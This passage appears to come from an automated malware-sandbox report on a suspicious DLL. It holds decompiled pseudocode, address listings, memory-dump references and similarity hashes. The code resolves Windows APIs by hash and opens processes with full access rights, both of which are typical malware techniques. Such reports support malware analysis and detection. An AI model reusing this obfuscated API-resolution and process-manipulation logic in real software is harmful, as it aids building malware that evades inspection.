										 *((intOrPtr*)(_t439 + 0xa4)) = E6E47F4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0xa0)) = E6E47F4BC( *((intOrPtr*)(_t439 + 8)), _t422);
										E6E4838F0( *((intOrPtr*)(_t439 + 0xac)),  *((intOrPtr*)(_t439 + 0xa4)), E6E47F4CC( *((intOrPtr*)(_t439 + 4))) - _t422);
										_t439 = _t439 + 0xc;
									}
									E6E47F828( *((intOrPtr*)(_t439 + 8)), E6E47F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t33 =  &(_t308[7]);
									 *_t33 = _t308[7] - 1;
									__eflags =  *_t33;
								}
								_t434 = _t434 - 1;
								__eflags = _t434;
								goto L20;
							}
							_t421 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6E47F4BC(_t439 + 0x28, _t421 * 4));
								__eflags = _t392 -  *_t404;
								if(_t392 ==  *_t404) {
									break;
								}
								_t421 = _t421 + 1;
								__eflags = _t421 -  *(_t439 + 0x7c);
								if(_t421 <  *(_t439 + 0x7c)) {
									continue;
								}
								goto L11;
							}
							__eflags = _t421 - 0xffffffff;
							if(_t421 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t434 = _t434 + 1;
							__eflags = _t434 - _t308[1];
						} while (_t434 < _t308[1]);
						goto L21;
					}
				}
			}













































                                                                                                        0x6e47a4f2
                                                                                                        0x6e47a4f4
                                                                                                        0x6e47a4ff
                                                                                                        0x6e47a505
                                                                                                        0x6e47a509
                                                                                                        0x6e47a50e
                                                                                                        0x6e47a514
                                                                                                        0x6e47a524
                                                                                                        0x00000000
                                                                                                        0x6e47a526
                                                                                                        0x6e47a526
                                                                                                        0x6e47a531
                                                                                                        0x6e47a531
                                                                                                        0x6e47aaaf
                                                                                                        0x6e47aab1
                                                                                                        0x6e47aab2
                                                                                                        0x6e47aaf1
                                                                                                        0x6e47aaf5
                                                                                                        0x6e47ab03
                                                                                                        0x6e47ab11
                                                                                                        0x6e47ab11
                                                                                                        0x6e47aafc
                                                                                                        0x6e47ab17
                                                                                                        0x6e47ab1c
                                                                                                        0x00000000
                                                                                                        0x6e47ab1c
                                                                                                        0x6e47ab00
                                                                                                        0x6e47ab01
                                                                                                        0x00000000
                                                                                                        0x6e47a53b
                                                                                                        0x6e47a53b
                                                                                                        0x6e47a53f
                                                                                                        0x6e47a646
                                                                                                        0x6e47a646
                                                                                                        0x6e47a64b
                                                                                                        0x6e47a75c
                                                                                                        0x6e47a760
                                                                                                        0x6e47a765
                                                                                                        0x6e47a769
                                                                                                        0x6e47a893
                                                                                                        0x6e47a895
                                                                                                        0x6e47a899
                                                                                                        0x6e47a8a2
                                                                                                        0x6e47a8ab
                                                                                                        0x6e47a8af
                                                                                                        0x6e47a8b8
                                                                                                        0x6e47a8bf
                                                                                                        0x6e47a8c0
                                                                                                        0x6e47a8c4
                                                                                                        0x6e47a8c8
                                                                                                        0x6e47a8cc
                                                                                                        0x6e47a8ce
                                                                                                        0x6e47aa38
                                                                                                        0x6e47aa38
                                                                                                        0x6e47aa40
                                                                                                        0x6e47aa58
                                                                                                        0x6e47aa5a
                                                                                                        0x6e47aa5c
                                                                                                        0x6e47aa96
                                                                                                        0x6e47aa96
                                                                                                        0x6e47aa98
                                                                                                        0x6e47aa98
                                                                                                        0x6e47aa9b
                                                                                                        0x6e47aab6
                                                                                                        0x6e47aaca
                                                                                                        0x6e47aacd
                                                                                                        0x6e47aad2
                                                                                                        0x6e47aadd
                                                                                                        0x6e47aade
                                                                                                        0x6e47aae1
                                                                                                        0x6e47aae3
                                                                                                        0x6e47aaec
                                                                                                        0x00000000
                                                                                                        0x6e47aaec
                                                                                                        0x6e47aa9d
                                                                                                        0x6e47aaa1
                                                                                                        0x6e47aaaa
                                                                                                        0x00000000
                                                                                                        0x6e47aaaa
                                                                                                        0x6e47aa6d
                                                                                                        0x6e47aa7d
                                                                                                        0x6e47aa81
                                                                                                        0x6e47aa81
                                                                                                        0x6e47aa84
                                                                                                        0x6e47aa87
                                                                                                        0x6e47aa8a
                                                                                                        0x6e47aa90
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e47aa92
                                                                                                        0x6e47a8d6
                                                                                                        0x6e47a8d6
                                                                                                        0x6e47a8d8
                                                                                                        0x6e47a8dc
                                                                                                        0x6e47a8e1
                                                                                                        0x6e47a8e3
                                                                                                        0x6e47a8e7
                                                                                                        0x6e47a8ea
                                                                                                        0x6e47a8f2
                                                                                                        0x6e47a8f4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e47a90b
                                                                                                        0x6e47a926
                                                                                                        0x6e47a928
                                                                                                        0x6e47a93b
                                                                                                        0x6e47a93d
                                                                                                        0x6e47a93f
                                                                                                        0x6e47a95a
                                                                                                        0x6e47a95a
                                                                                                        0x6e47a95e
                                                                                                        0x6e47a960
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e47a962
                                                                                                        0x6e47a965
                                                                                                        0x6e47a986
                                                                                                        0x6e47a9a5
                                                                                                        0x6e47a9ab
                                                                                                        0x6e47a9ae
                                                                                                        0x6e47a9b3
                                                                                                        0x6e47a9b4
                                                                                                        0x6e47a9b8
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e47a9c0
                                                                                                        0x6e47a9c0
                                                                                                        0x6e47a9c2
                                                                                                        0x6e47a9ce
                                                                                                        0x6e47a9da
                                                                                                        0x6e47a9e4
                                                                                                        0x6e47a9e7
                                                                                                        0x6e47a9ea
                                                                                                        0x6e47a9ee
                                                                                                        0x6e47a9f5
                                                                                                        0x6e47a9f9
                                                                                                        0x6e47a9fd
                                                                                                        0x6e47a9fe
                                                                                                        0x6e47aa02
                                                                                                        0x6e47aa07
                                                                                                        0x6e47aa0c
                                                                                                        0x6e47aa10
                                                                                                        0x6e47aa14
                                                                                                        0x6e47aa1a
                                                                                                        0x6e47aa20
                                                                                                        0x6e47aa26
                                                                                                        0x6e47aa2c
                                                                                                        0x6e47aa31
                                                                                                        0x6e47aa32
                                                                                                        0x6e47aa32
                                                                                                        0x00000000
                                                                                                        0x6e47a9c2
                                                                                                        0x00000000
                                                                                                        0x6e47a965
                                                                                                        0x6e47a943
                                                                                                        0x6e47a954
                                                                                                        0x6e47a956
                                                                                                        0x6e47a958
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e47a958
                                                                                                        0x6e47a96b
                                                                                                        0x00000000
                                                                                                        0x6e47a96b
                                                                                                        0x6e47a76f
                                                                                                        0x6e47a772
                                                                                                        0x6e47a774
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e47a77c
                                                                                                        0x6e47a77c
                                                                                                        0x6e47a77e
                                                                                                        0x6e47a77e
                                                                                                        0x6e47a78f
                                                                                                        0x6e47a791
                                                                                                        0x6e47a794
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e47a88a
                                                                                                        0x6e47a88b
                                                                                                        0x6e47a88d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e47a88d
                                                                                                        0x6e47a79a
                                                                                                        0x6e47a79d
                                                                                                        0x6e47a7a7
                                                                                                        0x6e47a7ac
                                                                                                        0x6e47a7ae
                                                                                                        0x6e47a7b4
                                                                                                        0x6e47a7bb
                                                                                                        0x6e47a7bf
                                                                                                        0x6e47a7c4
                                                                                                        0x6e47a7c8
                                                                                                        0x6e47ac03
                                                                                                        0x6e47ac17
                                                                                                        0x6e47ac3a
                                                                                                        0x6e47ac3f
                                                                                                        0x6e47ac3f
                                                                                                        0x6e47a7df
                                                                                                        0x6e47a7e4
                                                                                                        0x6e47a7e4
                                                                                                        0x6e47a7e4
                                                                                                        0x6e47a7e4
                                                                                                        0x6e47a7ea
                                                                                                        0x6e47a7ef
                                                                                                        0x6e47a7f1
                                                                                                        0x6e47a7f6
                                                                                                        0x6e47a7fd
                                                                                                        0x6e47a802
                                                                                                        0x6e47a804
                                                                                                        0x6e47abc1
                                                                                                        0x6e47abd2
                                                                                                        0x6e47abec
                                                                                                        0x6e47abf1
                                                                                                        0x6e47abf1
                                                                                                        0x6e47a81a
                                                                                                        0x6e47a81f
                                                                                                        0x6e47a81f
                                                                                                        0x6e47a81f
                                                                                                        0x6e47a81f
                                                                                                        0x6e47a833
                                                                                                        0x6e47a851
                                                                                                        0x6e47a856
                                                                                                        0x6e47a866
                                                                                                        0x6e47a883
                                                                                                        0x6e47a885
                                                                                                        0x6e47a885
                                                                                                        0x00000000
                                                                                                        0x6e47a79d
                                                                                                        0x6e47a653
                                                                                                        0x6e47a653
                                                                                                        0x6e47a655
                                                                                                        0x6e47a65c
                                                                                                        0x6e47a66a
                                                                                                        0x6e47a66c
                                                                                                        0x6e47a66f
                                                                                                        0x6e47a676
                                                                                                        0x6e47a678
                                                                                                        0x6e47a6a9
                                                                                                        0x6e47a6b8
                                                                                                        0x6e47a6ba
                                                                                                        0x6e47a6bc
                                                                                                        0x6e47a6da
                                                                                                        0x6e47a6dc
                                                                                                        0x6e47a6de
                                                                                                        0x6e47a6f1
                                                                                                        0x6e47a710
                                                                                                        0x6e47a716
                                                                                                        0x6e47a719
                                                                                                        0x6e47a730
                                                                                                        0x6e47a74c
                                                                                                        0x6e47a74e
                                                                                                        0x6e47a74e
                                                                                                        0x6e47a74e
                                                                                                        0x6e47a74e
                                                                                                        0x6e47a6de
                                                                                                        0x00000000
                                                                                                        0x6e47a6bc
                                                                                                        0x6e47a67c
                                                                                                        0x6e47a67c
                                                                                                        0x6e47a67e
                                                                                                        0x6e47a68f
                                                                                                        0x6e47a691
                                                                                                        0x6e47a693
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e47a69f
                                                                                                        0x6e47a6a0
                                                                                                        0x6e47a6a7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e47a6a7
                                                                                                        0x6e47a695
                                                                                                        0x6e47a698
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e47a751
                                                                                                        0x6e47a751
                                                                                                        0x6e47a752
                                                                                                        0x6e47a752
                                                                                                        0x00000000
                                                                                                        0x6e47a545
                                                                                                        0x6e47a547
                                                                                                        0x6e47a547
                                                                                                        0x6e47a549
                                                                                                        0x6e47a550
                                                                                                        0x6e47a55e
                                                                                                        0x6e47a560
                                                                                                        0x6e47a564
                                                                                                        0x6e47a568
                                                                                                        0x6e47a56a
                                                                                                        0x6e47a598
                                                                                                        0x6e47a59b
                                                                                                        0x6e47a5a0
                                                                                                        0x6e47a5a4
                                                                                                        0x6e47a5a9
                                                                                                        0x6e47a5b0
                                                                                                        0x6e47a5b5
                                                                                                        0x6e47a5b7
                                                                                                        0x6e47ab7e
                                                                                                        0x6e47ab8f
                                                                                                        0x6e47abaf
                                                                                                        0x6e47abb4
                                                                                                        0x6e47abb4
                                                                                                        0x6e47a5cd
                                                                                                        0x6e47a5d2
                                                                                                        0x6e47a5d2
                                                                                                        0x6e47a5d2
                                                                                                        0x6e47a5d2
                                                                                                        0x6e47a5e4
                                                                                                        0x6e47a5e6
                                                                                                        0x6e47a5e8
                                                                                                        0x6e47a5f9
                                                                                                        0x6e47a5f9
                                                                                                        0x6e47a5ff
                                                                                                        0x6e47a604
                                                                                                        0x6e47a608
                                                                                                        0x6e47a60e
                                                                                                        0x6e47a615
                                                                                                        0x6e47a61a
                                                                                                        0x6e47a61c
                                                                                                        0x6e47ab32
                                                                                                        0x6e47ab43
                                                                                                        0x6e47ab64
                                                                                                        0x6e47ab69
                                                                                                        0x6e47ab69
                                                                                                        0x6e47a633
                                                                                                        0x6e47a638
                                                                                                        0x6e47a638
                                                                                                        0x6e47a638
                                                                                                        0x6e47a638
                                                                                                        0x6e47a63b
                                                                                                        0x6e47a63b
                                                                                                        0x00000000
                                                                                                        0x6e47a63b
                                                                                                        0x6e47a56e
                                                                                                        0x6e47a56e
                                                                                                        0x6e47a570
                                                                                                        0x6e47a581
                                                                                                        0x6e47a583
                                                                                                        0x6e47a585
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e47a591
                                                                                                        0x6e47a592
                                                                                                        0x6e47a596
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e47a596
                                                                                                        0x6e47a587
                                                                                                        0x6e47a58a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e47a63c
                                                                                                        0x6e47a63c
                                                                                                        0x6e47a63d
                                                                                                        0x6e47a63d
                                                                                                        0x00000000
                                                                                                        0x6e47a549
                                                                                                        0x6e47a53f

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp Download File
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID: 0-3916222277
                                                                                                        • Opcode ID: 1e19f48ab1ebb66dade0cbd36344482ead3a6b9c60c6d1263ec1782a47758a6e
                                                                                                        • Instruction ID: 33183007dd460dd14bbbbdee96dcb1f01e6dfcbabfed66f237eaf4f021449526
                                                                                                        • Opcode Fuzzy Hash: 1e19f48ab1ebb66dade0cbd36344482ead3a6b9c60c6d1263ec1782a47758a6e
                                                                                                        • Instruction Fuzzy Hash: 97127F715192019FCB34DFB4C880EEAB7A9AF95304F104E1EE999972A1EB30DC45DBC2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 6E478428, Relevance: 1.8, Strings: 1, Instructions: 531COMMONCrypto
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 93%
                                                                                                        			E6E478428(signed int* __ecx, intOrPtr __edx, void* __eflags) {
				void* __esi;
				void* __ebp;
				signed int* _t173;
				signed int* _t178;
				void* _t180;
				void* _t181;
				intOrPtr* _t188;
				signed int _t202;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t217;
				signed int* _t218;
				void* _t219;
				void* _t220;
				void* _t237;
				void* _t238;
				signed int* _t246;
				void* _t247;
				signed int* _t258;
				intOrPtr* _t269;
				signed int* _t277;
				intOrPtr* _t279;
				void* _t283;
				void* _t285;
				void* _t287;
				signed int* _t296;
				void* _t299;
				signed int* _t308;
				intOrPtr* _t310;
				signed int _t315;
				intOrPtr _t317;
				signed int* _t322;
				signed int _t323;
				signed int _t324;
				void* _t343;
				void* _t414;
				signed int _t415;
				signed int* _t421;
				signed int _t427;
				intOrPtr* _t428;
				intOrPtr* _t429;
				signed int _t431;
				signed int _t433;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t442;
				void* _t443;
				signed int _t444;
				void* _t445;
				signed int _t446;
				intOrPtr* _t449;

				 *_t449 = __ecx + 0x1c;
				 *((intOrPtr*)(_t449 + 0x68)) = __edx;
				 *(_t449 + 4) = __ecx;
				 *(_t449 + 0x84) = 0;
				 *((intOrPtr*)(_t449 + 0x78)) = __ecx + 4;
				while(1) {
					_t413 =  *(_t449 + 0x6c);
					E6E47B658(_t449 + 0x24,  *(_t449 + 0x6c), 0x7fffffff);
					if(E6E47F4D0(_t449 + 0x24) == 0) {
						goto L3;
					} else {
						( *(_t449 + 4))[0xb] = 0;
						E6E47F654(_t449 + 0x24);
					}
					L60:
					_t317 = 0xffffffffffffffff;
					L62:
					if(_t317 != 0) {
						L65:
						return _t317;
					}
					if( *(_t449 + 0x84) != 0x20) {
						E6E482234(0x5dc, _t413, _t430);
						 *(_t449 + 0x84) =  *(_t449 + 0x84) + 1;
						continue;
					}
					_t317 = 0xffffffffffffffff;
					goto L65;
					L3:
					__eflags =  *( *(_t449 + 4));
					if( *( *(_t449 + 4)) <= 0) {
						L21:
						__eflags =  *(_t449 + 0x20);
						if( *(_t449 + 0x20) <= 0) {
							L33:
							E6E47F654(_t449 + 0x24);
							_t173 =  *(_t449 + 4);
							__eflags = _t173[0xb];
							if(_t173[0xb] == 0) {
								L46:
								 *((intOrPtr*)(_t449 + 8)) = 0;
								 *((intOrPtr*)(_t449 + 0xc)) = 0;
								E6E47F584(_t449 + 0x14, 0);
								 *((intOrPtr*)(_t449 + 0x34)) =  *((intOrPtr*)(_t449 + 0x68));
								 *((intOrPtr*)(_t449 + 0x38)) = 0;
								E6E47F584(_t449 + 0x40, 0);
								_t178 =  *(_t449 + 4);
								_t414 = 0x40;
								__eflags = _t178[6] - 0x40;
								_t415 =  <  ? _t178[6] : _t414;
								 *(_t449 + 0x80) = _t415;
								__eflags = _t415;
								if(_t415 <= 0) {
									L57:
									_t413 = E6E47F4BC(_t449 + 0x14, 0);
									_t180 = E6E482908( *((intOrPtr*)(_t449 + 0xc)), _t179, 0x3e8);
									_t132 = _t180 - 0x80; // -128
									_t181 = _t132;
									__eflags = _t181 - 0x3f;
									_t315 =  <=  ? _t181 : _t180;
									__eflags = _t315 - 0x102;
									if(_t315 == 0x102) {
										L59:
										E6E47B5C4(_t449 + 0x34);
										E6E47B5C4(_t449 + 8);
										goto L60;
									}
									__eflags = _t315 - 0x3f;
									if(_t315 <= 0x3f) {
										__eflags = _t315 << 2;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 8)) + 0x2c)) =  *((intOrPtr*)(E6E47F4BC( *(_t449 + 4), _t315 << 2)));
										_t188 = E6E47F4BC( *(_t449 + 0x7c), _t315 << 2);
										_t413 =  *(_t449 + 4);
										 *((intOrPtr*)(_t413 + 0x30)) =  *_t188;
										_t317 =  *((intOrPtr*)(_t413 + 0x2c));
										E6E47B5C4(_t449 + 0x34);
										E6E47B5C4(_t449 + 8);
										goto L62;
									}
									goto L59;
								}
								_t446 = 0;
								__eflags = 0;
								while(1) {
									E6E47CA8C(_t449 + 0x4c);
									_t413 = 0;
									_t343 = _t449 + 0x4c;
									 *((char*)(_t343 + 4)) = 0;
									 *((intOrPtr*)(_t343 + 0x20)) = 0;
									__eflags = E6E47C280(_t343);
									if(__eflags != 0) {
										break;
									}
									E6E47F828(_t449 + 0x14, E6E47F4CC(_t449 + 0x10) + 4);
									 *((intOrPtr*)(E6E47F4BC(_t449 + 0x14, E6E47F4CC(_t449 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t449 + 0x4c));
									 *((intOrPtr*)(_t449 + 0xc)) =  *((intOrPtr*)(_t449 + 0xc)) + 1;
									_t202 = E6E483064(0x60a28c5c, 0x3659ae1e);
									__eflags = _t202;
									if(_t202 == 0) {
										L51:
										_t413 =  *(_t449 + 0x6c);
										__eflags = _t413;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t413 - 0xffffffff;
										if(__eflags != 0) {
											E6E47F828(_t449 + 0x40, E6E47F4CC(_t449 + 0x3c) + 4);
											 *(E6E47F4BC(_t449 + 0x40, E6E47F4CC(_t449 + 0x3c) + 0xfffffffc)) =  *(_t449 + 0x6c);
											 *((intOrPtr*)(_t449 + 0x4c - 0x14)) =  *((intOrPtr*)(_t449 + 0x4c - 0x14)) + 1;
											E6E47CD24(_t449 + 0x4c, __eflags);
											_t446 = _t446 + 1;
											__eflags = _t446 -  *(_t449 + 0x80);
											if(_t446 <  *(_t449 + 0x80)) {
												continue;
											}
											_t431 = 0;
											__eflags = 0;
											do {
												_t211 = E6E47F4BC( *(_t449 + 4), _t431 * 4);
												_t212 = E6E47F4BC(_t449 + 0x40, _t431 * 4);
												E6E478B58( *_t211, E6E4802B0(0x60a28c5c, 0x840d15ae),  *_t212, 0, 0);
												_t431 = _t431 + 1;
												__eflags = _t431 -  *(_t449 + 0x80);
											} while (_t431 <  *(_t449 + 0x80));
											goto L57;
										}
										break;
									}
									_t413 = 0;
									_push(2);
									_push(0);
									_push(0);
									_push(_t449 + 0x6c);
									_push( *((intOrPtr*)(_t449 + 0x78)));
									_push( *((intOrPtr*)(_t449 + 0x60)));
									_push(0xffffffff);
									asm("int3");
									asm("int3");
									__eflags = _t202;
									if(__eflags != 0) {
										break;
									}
									goto L51;
								}
								E6E47CD24(_t449 + 0x4c, __eflags);
								goto L59;
							}
							_t427 =  *_t173;
							__eflags = _t427;
							if(_t427 <= 0) {
								goto L46;
							}
							_t430 = 0;
							__eflags = 0;
							_t322 =  &(_t173[1]);
							while(1) {
								_t433 = _t430 * 4;
								_t217 = E6E47F4BC(_t322, _t433);
								_t218 =  *(_t449 + 4);
								__eflags =  *_t217 - _t218[0xc];
								if( *_t217 == _t218[0xc]) {
									break;
								}
								_t430 = _t430 + 1;
								__eflags = _t430 - _t427;
								if(_t430 < _t427) {
									continue;
								}
								goto L46;
							}
							__eflags = _t430 - 0xffffffff;
							if(_t430 != 0xffffffff) {
								_t219 = E6E47F4CC( *_t449);
								__eflags = _t219 - _t433;
								if(_t219 > _t433) {
									 *((intOrPtr*)(_t449 + 0x74)) = 4 + _t430 * 4;
									_t247 = E6E47F4CC( *_t449);
									__eflags = _t247 -  *((intOrPtr*)(_t449 + 0x74));
									if(_t247 >  *((intOrPtr*)(_t449 + 0x74))) {
										 *((intOrPtr*)(_t449 + 0x90)) = E6E47F4BC( *(_t449 + 4), _t433);
										 *((intOrPtr*)(_t449 + 0x8c)) = E6E47F4BC( *(_t449 + 4),  *((intOrPtr*)(_t449 + 0x74)));
										E6E4838F0( *((intOrPtr*)(_t449 + 0x98)),  *((intOrPtr*)(_t449 + 0x90)), E6E47F4CC( *_t449) -  *((intOrPtr*)(_t449 + 0x74)));
										_t449 = _t449 + 0xc;
									}
									E6E47F828( *(_t449 + 4), E6E47F4CC( *_t449) + 0xfffffffc);
									_t421 =  *(_t449 + 4);
									_t75 =  &(_t421[6]);
									 *_t75 = _t421[6] - 1;
									__eflags =  *_t75;
								}
								_t220 = E6E47F4CC(_t322);
								__eflags = _t220 - _t433;
								if(_t220 > _t433) {
									_t430 = 4 + _t430 * 4;
									_t237 = E6E47F4CC(_t322);
									__eflags = _t237 - _t430;
									if(_t237 > _t430) {
										_t238 = E6E47F4BC(_t322, _t433);
										 *((intOrPtr*)(_t449 + 0x94)) = E6E47F4BC(_t322, _t430);
										E6E4838F0(_t238,  *((intOrPtr*)(_t449 + 0x98)), E6E47F4CC(_t322) - _t430);
										_t449 = _t449 + 0xc;
									}
									E6E47F828(_t322, E6E47F4CC(_t322) + 0xfffffffc);
									_t246 =  *(_t449 + 4);
									 *_t246 =  *_t246 - 1;
									__eflags =  *_t246;
								}
								E6E47F828( *(_t449 + 4), E6E47F4CC( *_t449) + 4);
								 *(E6E47F4BC( *(_t449 + 4), E6E47F4CC( *_t449) + 0xfffffffc)) = ( *(_t449 + 4))[0xb];
								( *(_t449 + 4))[6] = ( *(_t449 + 4))[6] + 1;
								E6E47F828(_t322, E6E47F4CC(_t322) + 4);
								 *(E6E47F4BC(_t322, E6E47F4CC(_t322) + 0xfffffffc)) = ( *(_t449 + 4))[0xc];
								 *( *(_t449 + 4)) =  *( *(_t449 + 4)) + 1;
							}
							goto L46;
						}
						_t323 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x7c) = _t323 * 4;
							_t428 = E6E47F4BC(_t449 + 0x28, _t323 * 4);
							_t258 =  *(_t449 + 4);
							_t430 =  *_t258;
							__eflags = _t430;
							if(_t430 <= 0) {
								L29:
								_t437 = E6E483064(0x8e844d1e, 0x5c3654e3);
								__eflags = _t437;
								if(_t437 != 0) {
									_t439 =  *_t437(0x1fffff, 0,  *((intOrPtr*)(E6E47F4BC(_t449 + 0x28,  *(_t449 + 0x7c)))));
									__eflags = _t439;
									if(_t439 != 0) {
										E6E47F828( *(_t449 + 4), E6E47F4CC( *_t449) + 4);
										 *(E6E47F4BC( *(_t449 + 4), E6E47F4CC( *_t449) + 0xfffffffc)) = _t439;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) + 1;
										_t269 = E6E47F4BC(_t449 + 0x28,  *(_t449 + 0x7c));
										 *(_t449 + 0x70) =  &(( *(_t449 + 4))[1]);
										E6E47F828( *((intOrPtr*)(_t449 + 0x74)), E6E47F4CC( &(( *(_t449 + 4))[1])) + 4);
										 *((intOrPtr*)(E6E47F4BC( *((intOrPtr*)(_t449 + 0x74)), E6E47F4CC( *(_t449 + 0x70)) + 0xfffffffc))) =  *_t269;
										_t277 =  *(_t449 + 4);
										 *_t277 =  *_t277 + 1;
										__eflags =  *_t277;
									}
								}
								goto L32;
							}
							_t438 = 0;
							__eflags = 0;
							 *(_t449 + 0x88) =  &(_t258[1]);
							while(1) {
								_t279 = E6E47F4BC( *((intOrPtr*)(_t449 + 0x8c)), _t438 * 4);
								__eflags =  *_t279 -  *_t428;
								if( *_t279 ==  *_t428) {
									break;
								}
								_t438 = _t438 + 1;
								__eflags = _t438 - _t430;
								if(_t438 < _t430) {
									continue;
								}
								goto L29;
							}
							__eflags = _t438 - 0xffffffff;
							if(_t438 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t323 = _t323 + 1;
							__eflags = _t323 -  *(_t449 + 0x20);
						} while (_t323 <  *(_t449 + 0x20));
						goto L33;
					} else {
						_t324 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x64) = _t324 * 4;
							_t429 = E6E47F4BC( *(_t449 + 0x7c), _t324 * 4);
							_t430 =  *(_t449 + 0x20);
							__eflags = _t430;
							if(_t430 <= 0) {
								L11:
								_t430 =  &(( *(_t449 + 4))[1]);
								_t283 = E6E47F4CC( &(( *(_t449 + 4))[1]));
								__eflags = _t283 -  *(_t449 + 0x64);
								if(_t283 >  *(_t449 + 0x64)) {
									_t443 = 4 + _t324 * 4;
									_t299 = E6E47F4CC(_t430);
									__eflags = _t299 - _t443;
									if(_t299 > _t443) {
										 *((intOrPtr*)(_t449 + 0x9c)) = E6E47F4BC(_t430,  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0x98)) = E6E47F4BC(_t430, _t443);
										E6E4838F0( *((intOrPtr*)(_t449 + 0xa4)),  *((intOrPtr*)(_t449 + 0x9c)), E6E47F4CC(_t430) - _t443);
										_t449 = _t449 + 0xc;
									}
									E6E47F828(_t430, E6E47F4CC(_t430) + 0xfffffffc);
									_t308 =  *(_t449 + 4);
									 *_t308 =  *_t308 - 1;
									__eflags =  *_t308;
								}
								_t442 = E6E483064(0x60a28c5c, 0xe96b154c);
								__eflags = _t442;
								if(_t442 != 0) {
									 *_t442( *(E6E47F4BC( *(_t449 + 4),  *(_t449 + 0x64))));
								}
								_t285 = E6E47F4CC( *_t449);
								__eflags = _t285 -  *(_t449 + 0x64);
								if(_t285 >  *(_t449 + 0x64)) {
									_t445 = 4 + _t324 * 4;
									_t287 = E6E47F4CC( *_t449);
									__eflags = _t287 - _t445;
									if(_t287 > _t445) {
										_t430 = E6E47F4BC( *(_t449 + 4),  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0xa0)) = E6E47F4BC( *(_t449 + 4), _t445);
										E6E4838F0(_t288,  *((intOrPtr*)(_t449 + 0xa4)), E6E47F4CC( *_t449) - _t445);
										_t449 = _t449 + 0xc;
									}
									E6E47F828( *(_t449 + 4), E6E47F4CC( *_t449) + 0xfffffffc);
									_t296 =  *(_t449 + 4);
									_t33 =  &(_t296[6]);
									 *_t33 = _t296[6] - 1;
									__eflags =  *_t33;
								}
								_t324 = _t324 - 1;
								__eflags = _t324;
								goto L20;
							}
							_t444 = 0;
							__eflags = 0;
							while(1) {
								_t310 = E6E47F4BC(_t449 + 0x28, _t444 * 4);
								__eflags =  *_t310 -  *_t429;
								if( *_t310 ==  *_t429) {
									break;
								}
								_t444 = _t444 + 1;
								__eflags = _t444 - _t430;
								if(_t444 < _t430) {
									continue;
								}
								goto L11;
							}
							__eflags = _t444 - 0xffffffff;
							if(_t444 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t324 = _t324 + 1;
							__eflags = _t324 -  *( *(_t449 + 4));
						} while (_t324 <  *( *(_t449 + 4)));
						goto L21;
					}
				}
			}























































                                                                                                        0x6e478435
                                                                                                        0x6e47843b
                                                                                                        0x6e47843f
                                                                                                        0x6e478443
                                                                                                        0x6e47844e
                                                                                                        0x6e478452
                                                                                                        0x6e478457
                                                                                                        0x6e47845f
                                                                                                        0x6e47846f
                                                                                                        0x00000000
                                                                                                        0x6e478471
                                                                                                        0x6e478479
                                                                                                        0x6e478480
                                                                                                        0x6e478480
                                                                                                        0x6e4789d3
                                                                                                        0x6e4789d5
                                                                                                        0x6e478a16
                                                                                                        0x6e478a18
                                                                                                        0x6e478a27
                                                                                                        0x6e478a33
                                                                                                        0x6e478a33
                                                                                                        0x6e478a22
                                                                                                        0x6e478a39
                                                                                                        0x6e478a3e
                                                                                                        0x00000000
                                                                                                        0x6e478a3e
                                                                                                        0x6e478a26
                                                                                                        0x00000000
                                                                                                        0x6e47848a
                                                                                                        0x6e47848e
                                                                                                        0x6e478491
                                                                                                        0x6e478599
                                                                                                        0x6e478599
                                                                                                        0x6e47859e
                                                                                                        0x6e4786c1
                                                                                                        0x6e4786c5
                                                                                                        0x6e4786ca
                                                                                                        0x6e4786ce
                                                                                                        0x6e4786d2
                                                                                                        0x6e478808
